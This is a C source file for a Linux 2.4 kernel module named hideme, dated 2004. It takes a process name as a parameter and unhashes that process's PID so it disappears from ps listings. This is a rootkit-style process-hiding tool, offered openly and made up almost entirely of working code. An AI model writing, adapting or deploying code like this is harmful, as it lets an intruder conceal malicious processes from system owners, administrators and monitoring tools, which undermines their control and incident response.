/*
 * hideme.c
 *
 * Copyright (C) 2004 Eric Dobbs <edobbs (at) freemode (dot) net>
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License (LICENSE file) for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, write to the Free Software
 * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307,
 * USA.
 *
 */

#include <linux/module.h>  /* Needed by all modules */
#include <linux/kernel.h>  /* Needed for KERN_ALERT */
#include <linux/init.h>  /* Needed for module_init, module_exit */
#include <linux/sched.h>  /* Needed for write_lock_irq */

#define MYMODNAME "hideme"
#define PROCNAMELEN 16

/* Function headers */
static int my_init_module(void);
static void my_cleanup_module(void);
struct task_struct *find_task_by_name(char[PROCNAMELEN]);
struct task_struct *p = NULL;
int hide_task(struct task_struct *);

/* ======================= Actual code ======================= */

/* What's the default process name? */
static char *procname = "foo";
/* Non-verbose by default */
static int verbose = 0;

/* Get argument if present */
/* Generally done by 'insmod ./hideme.o procname="value" verbose=1' */
MODULE_PARM (procname, "s");
MODULE_PARM (verbose, "i");

struct task_struct *find_task_by_name(char in_name[PROCNAMELEN])
{
    struct task_struct *task = current;

    do {
        if( strncmp(task->comm,in_name,PROCNAMELEN) == 0 )
            return(task);
        task = task->next_task; /* Old-style, works with 2.4-series kernels */
/*      next_task(task); */ /* New-style, works with 2.6-series kernels */
    } while(task != current);

    return(NULL);
}

int hide_task(struct task_struct *t)
{
    /* Remove process from ps listings */
    write_lock_irq(&tasklist_lock);
    unhash_pid(t);
    t->pidhash_pprev = &t->pidhash_next;
    t->pidhash_next = NULL;
    write_unlock_irq(&tasklist_lock);

    return 0;
}

static int my_init_module(void)
{
    if (verbose) {
        printk(KERN_ALERT "Module %s loaded.\n", MYMODNAME);
        printk(KERN_ALERT "%s: used %s as argument.\n", MYMODNAME, procname);
    }

    /* Do we have a matching process? */
    p = find_task_by_name(procname);

    if ( p != NULL ) {
        pid_t mypid;
        mypid = p->pid;
        if (verbose)
            printk(KERN_ALERT "%s: process pid %i matches argument %s.\n",
                MYMODNAME, mypid, procname);

        hide_task(p);
        if (verbose)
            printk(KERN_ALERT "%s: hid process pid %i.\n", MYMODNAME, mypid);

    } else {
        if (verbose)
            printk(KERN_ALERT "%s: found no process matching argument %s.\n",
                MYMODNAME, procname);
    }

    /* Module won't load unless this function returns 0 */
    return 0;
}

static void my_cleanup_module(void)
{
    if (verbose)
        printk(KERN_ALERT "Module %s unloaded.\n", MYMODNAME);
}

/* Where's my entry and exit points? */
module_init(my_init_module);
module_exit(my_cleanup_module);


/* Anti-taint and module doc */
MODULE_LICENSE("GPL");
MODULE_AUTHOR("Eric Dobbs <edobbs (at) freemode (dot) net>");
MODULE_DESCRIPTION("Process hiding module");
/* We tie into /dev/foo* devices */
MODULE_SUPPORTED_DEVICE("foo");

/* eof */
